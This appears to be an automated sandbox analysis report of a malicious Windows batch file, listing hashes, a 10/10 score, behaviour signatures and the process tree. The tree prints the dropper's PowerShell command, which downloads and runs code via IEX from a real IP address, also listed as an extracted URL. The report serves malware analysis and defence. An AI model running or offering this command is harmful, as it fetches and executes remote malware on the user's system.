Analysis
-
max time kernel
136s -
max time network
98s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
10-07-2020 20:10
General
-
Target
2211aeb68404653c6a42054308cf95e6.bat
-
Size
219B
-
MD5
68b33bb8cfe6e6cfbc8be50a90b3084b
-
SHA1
8b32c94506fe4bc67c38f6c1dbb955603dbc2ba4
-
SHA256
2311d76b97db37109d14a91f693f468810b9e530aa7f6a9d75dc827757054d6a
-
SHA512
6a328a1dc19ccddef2bb9aeb38fe874646b7789083360bb026435cb799e93b5a578713a53b45bb52a1f75327bc763054ebf2d2c53d2657dd20d88f89f8f84928
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/2211aeb68404653c6a42054308cf95e6
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2211aeb68404653c6a42054308cf95e6.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2211aeb68404653c6a42054308cf95e6');Invoke-LJICDRBAHEGJ;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/992-0-0x0000000000000000-mapping.dmp
-
memory/992-2-0x0000000000000000-mapping.dmp
-
memory/992-3-0x0000000000000000-mapping.dmp
-
memory/992-5-0x0000000000000000-mapping.dmp
-
memory/992-4-0x0000000000000000-mapping.dmp
-
memory/992-6-0x0000000000000000-mapping.dmp
-
memory/992-7-0x0000000000000000-mapping.dmp
-
memory/1800-1-0x00000000050A0000-0x00000000050A1000-memory.dmpFilesize
4KB
-
memory/1800-8-0x00000000056D0000-0x00000000056D1000-memory.dmpFilesize
4KB